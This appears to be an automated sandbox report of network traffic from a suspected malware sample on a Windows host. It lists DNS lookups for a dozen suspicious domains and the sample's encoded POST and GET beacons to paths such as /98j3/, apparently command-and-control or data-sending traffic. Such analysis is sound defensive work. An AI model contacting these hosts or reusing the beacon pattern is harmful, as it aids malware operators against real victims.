                                                                                                              Jan 11, 2025 03:26:02.403770924 CET5154880192.168.2.10149.88.81.190
                                                                                                              Jan 11, 2025 03:26:02.449805975 CET8051548149.88.81.190192.168.2.10
                                                                                                              Jan 11, 2025 03:27:12.924371958 CET5156380192.168.2.10208.91.197.39
                                                                                                              Jan 11, 2025 03:27:12.929234982 CET8051563208.91.197.39192.168.2.10
                                                                                                              Jan 11, 2025 03:27:17.961138964 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:17.967442989 CET805156443.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:17.967531919 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:17.985789061 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:17.990746021 CET805156443.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:18.812952042 CET805156443.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:18.813049078 CET805156443.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:18.813215017 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:19.494910955 CET5156480192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:20.513711929 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:20.518865108 CET805156543.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:20.518951893 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:20.534059048 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:20.538971901 CET805156543.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:21.365241051 CET805156543.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:21.365267038 CET805156543.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:21.365405083 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:22.041532040 CET5156580192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:23.061124086 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:23.066323042 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.066472054 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:23.080753088 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:23.086766005 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.086802006 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.923000097 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.923063040 CET805156643.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:23.923124075 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:24.589719057 CET5156680192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:25.608016968 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:25.613069057 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:25.613171101 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:25.625957012 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:25.630896091 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:26.532979012 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:26.533086061 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:26.533154964 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:26.536716938 CET5156780192.168.2.1043.205.198.29
                                                                                                              Jan 11, 2025 03:27:26.541521072 CET805156743.205.198.29192.168.2.10
                                                                                                              Jan 11, 2025 03:27:31.570478916 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:31.575488091 CET8051568188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:31.581444025 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:31.591665983 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:31.596684933 CET8051568188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:33.106848955 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:33.112138987 CET8051568188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:33.114912987 CET5156880192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:34.139203072 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:34.144174099 CET8051569188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:34.144278049 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:34.177995920 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:34.182957888 CET8051569188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:35.682271957 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:35.688771963 CET8051569188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:35.688838959 CET5156980192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:36.767389059 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:36.772567034 CET8051570188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:36.772706032 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:36.788934946 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:36.793884039 CET8051570188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:36.794042110 CET8051570188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:38.291580915 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:38.296701908 CET8051570188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:38.296801090 CET5157080192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:39.312074900 CET5157180192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:39.318622112 CET8051571188.114.97.3192.168.2.10
                                                                                                              Jan 11, 2025 03:27:39.319014072 CET5157180192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:39.330887079 CET5157180192.168.2.10188.114.97.3
                                                                                                              Jan 11, 2025 03:27:39.337284088 CET8051571188.114.97.3192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 03:24:32.481313944 CET | 60818 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:24:33.166651964 CET | 53 | 60818 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:24:36.112626076 CET | 53 | 52464 | 162.159.36.2 | 192.168.2.10
Jan 11, 2025 03:24:36.647425890 CET | 53 | 62147 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:24:49.232856035 CET | 52656 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:24:49.247107983 CET | 53 | 52656 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:25:05.641524076 CET | 64369 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:25:05.761153936 CET | 53 | 64369 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:25:19.028928995 CET | 64185 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:25:19.528510094 CET | 53 | 64185 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:25:32.878221989 CET | 59375 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:25:32.894695044 CET | 53 | 59375 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:25:46.299457073 CET | 50091 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:25:46.819602013 CET | 53 | 50091 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:26:00.139420986 CET | 51726 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:26:00.859113932 CET | 53 | 51726 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:26:34.891976118 CET | 62236 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:26:35.437407970 CET | 53 | 62236 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:26:49.157565117 CET | 58232 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:26:49.464622974 CET | 53 | 58232 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:27:03.030003071 CET | 59386 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:27:03.283600092 CET | 53 | 59386 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:27:17.937376022 CET | 58698 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:27:17.957658052 CET | 53 | 58698 | 1.1.1.1 | 192.168.2.10
Jan 11, 2025 03:27:31.545994997 CET | 49806 | 53 | 192.168.2.10 | 1.1.1.1
Jan 11, 2025 03:27:31.559396982 CET | 53 | 49806 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 11, 2025 03:24:32.481313944 CET | 192.168.2.10 | 1.1.1.1 | 0xdaee | Standard query (0) | www.thaor56.online | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:24:49.232856035 CET | 192.168.2.10 | 1.1.1.1 | 0x53a9 | Standard query (0) | www.optimismbank.xyz | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:05.641524076 CET | 192.168.2.10 | 1.1.1.1 | 0x34bb | Standard query (0) | www.greenthub.life | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:19.028928995 CET | 192.168.2.10 | 1.1.1.1 | 0x6553 | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:32.878221989 CET | 192.168.2.10 | 1.1.1.1 | 0x4cdd | Standard query (0) | www.bankseedz.info | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:46.299457073 CET | 192.168.2.10 | 1.1.1.1 | 0x7a1a | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:26:00.139420986 CET | 192.168.2.10 | 1.1.1.1 | 0x1ed9 | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:26:34.891976118 CET | 192.168.2.10 | 1.1.1.1 | 0x6a0e | Standard query (0) | www.yc791022.asia | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:26:49.157565117 CET | 192.168.2.10 | 1.1.1.1 | 0x930b | Standard query (0) | www.43kdd.top | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:27:03.030003071 CET | 192.168.2.10 | 1.1.1.1 | 0x19fa | Standard query (0) | www.jcsa.info | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:27:17.937376022 CET | 192.168.2.10 | 1.1.1.1 | 0x800e | Standard query (0) | www.1secondlending.one | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:27:31.545994997 CET | 192.168.2.10 | 1.1.1.1 | 0x6ab2 | Standard query (0) | www.zkdamdjj.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 11, 2025 03:23:45.092792034 CET | 1.1.1.1 | 192.168.2.10 | 0x8491 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:23:45.092792034 CET | 1.1.1.1 | 192.168.2.10 | 0x8491 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:24:33.166651964 CET | 1.1.1.1 | 192.168.2.10 | 0xdaee | No error (0) | www.thaor56.online | thaor56.online | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:24:33.166651964 CET | 1.1.1.1 | 192.168.2.10 | 0xdaee | No error (0) | thaor56.online | | 202.92.5.23 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:24:49.247107983 CET | 1.1.1.1 | 192.168.2.10 | 0x53a9 | No error (0) | www.optimismbank.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:24:49.247107983 CET | 1.1.1.1 | 192.168.2.10 | 0x53a9 | No error (0) | www.optimismbank.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:05.761153936 CET | 1.1.1.1 | 192.168.2.10 | 0x34bb | No error (0) | www.greenthub.life | | 209.74.77.109 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:19.528510094 CET | 1.1.1.1 | 192.168.2.10 | 0x6553 | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:25:19.528510094 CET | 1.1.1.1 | 192.168.2.10 | 0x6553 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:19.528510094 CET | 1.1.1.1 | 192.168.2.10 | 0x6553 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:19.528510094 CET | 1.1.1.1 | 192.168.2.10 | 0x6553 | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:19.528510094 CET | 1.1.1.1 | 192.168.2.10 | 0x6553 | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:32.894695044 CET | 1.1.1.1 | 192.168.2.10 | 0x4cdd | No error (0) | www.bankseedz.info | | 46.30.211.38 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:25:46.819602013 CET | 1.1.1.1 | 192.168.2.10 | 0x7a1a | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:26:00.859113932 CET | 1.1.1.1 | 192.168.2.10 | 0x1ed9 | No error (0) | www.xcvbj.asia | | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:26:35.437407970 CET | 1.1.1.1 | 192.168.2.10 | 0x6a0e | No error (0) | www.yc791022.asia | | 101.35.209.183 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:26:49.464622974 CET | 1.1.1.1 | 192.168.2.10 | 0x930b | No error (0) | www.43kdd.top | 43kdd.top | | CNAME (Canonical name) | IN (0x0001) | false
Jan 11, 2025 03:26:49.464622974 CET | 1.1.1.1 | 192.168.2.10 | 0x930b | No error (0) | 43kdd.top | | 154.23.178.231 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:27:03.283600092 CET | 1.1.1.1 | 192.168.2.10 | 0x19fa | No error (0) | www.jcsa.info | | 208.91.197.39 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:27:17.957658052 CET | 1.1.1.1 | 192.168.2.10 | 0x800e | No error (0) | www.1secondlending.one | | 43.205.198.29 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:27:31.559396982 CET | 1.1.1.1 | 192.168.2.10 | 0x6ab2 | No error (0) | www.zkdamdjj.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 11, 2025 03:27:31.559396982 CET | 1.1.1.1 | 192.168.2.10 | 0x6ab2 | No error (0) | www.zkdamdjj.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
• www.thaor56.online
• www.optimismbank.xyz
• www.greenthub.life
• www.laohub10.net
• www.bankseedz.info
• www.madhf.tech
• www.xcvbj.asia
• www.yc791022.asia
• www.43kdd.top
• www.jcsa.info
• www.1secondlending.one
• www.zkdamdjj.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49981 | 202.92.5.23 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
Jan 11, 2025 03:24:33.257515907 CET | 489 | OUT | GET /fev0/?6n=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/+Qn9LZj60FJTogwY+WbqWfqijUMg==&P8dT=Gvw8Prk0H4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.thaor56.online
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:24:34.151530981 CET | 1236 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Sat, 11 Jan 2025 02:24:33 GMT
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 11, 2025 03:24:34.151547909 CET | 234 | IN | Data Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 51528 | 13.248.169.48 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:24:49.274996042 CET | 759 | OUT | POST /98j3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Connection: close
Host: www.optimismbank.xyz
Origin: http://www.optimismbank.xyz
Referer: http://www.optimismbank.xyz/98j3/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpEUqAve93mzXbAnC9lK5wP0uD2dv
Jan 11, 2025 03:24:49.713860035 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 51529 | 13.248.169.48 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:24:51.857460976 CET | 783 | OUT | POST /98j3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.optimismbank.xyz
Origin: http://www.optimismbank.xyz
Referer: http://www.optimismbank.xyz/98j3/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj4ogNwoF3pTlUF9oSSkjXDTtWGAPXw==
Jan 11, 2025 03:24:52.334850073 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 51530 | 13.248.169.48 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:24:54.592302084 CET | 1796 | OUT | POST /98j3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1227
Connection: close
Host: www.optimismbank.xyz
Origin: http://www.optimismbank.xyz
Referer: http://www.optimismbank.xyz/98j3/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n= [TRUNCATED]
Jan 11, 2025 03:24:55.059683084 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
content-length: 0
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.10 | 51531 | 13.248.169.48 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:24:57.135471106 CET | 491 | OUT | GET /98j3/?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.optimismbank.xyz
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Jan 11, 2025 03:25:00.623390913 CET | 371 | IN | HTTP/1.1 200 OK
content-type: text/html
date: Sat, 11 Jan 2025 02:25:00 GMT
content-length: 250
connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.10 | 51532 | 209.74.77.109 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:25:05.784127951 CET | 753 | OUT | POST /r3zg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 191
Connection: close
Host: www.greenthub.life
Origin: http://www.greenthub.life
Referer: http://www.greenthub.life/r3zg/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyQpI++8ITo9uUV7OFwn55JjLknKEb
Jan 11, 2025 03:25:06.361083984 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:25:06 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.10 | 51533 | 209.74.77.109 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:25:08.329047918 CET | 777 | OUT | POST /r3zg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
Connection: close
Host: www.greenthub.life
Origin: http://www.greenthub.life
Referer: http://www.greenthub.life/r3zg/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 6n=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUXqpMxxVN80aXKYtEBFaMnmc7xjVg==
Jan 11, 2025 03:25:08.901336908 CET | 533 | IN | HTTP/1.1 404 Not Found
Date: Sat, 11 Jan 2025 02:25:08 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 51534 | 209.74.77.109 | 80 | 6148 | C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 03:25:10.876740932 CET | 1790 | OUT | POST /r3zg/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1227
Connection: close
Host: www.greenthub.life
Origin: http://www.greenthub.life
Referer: http://www.greenthub.life/r3zg/
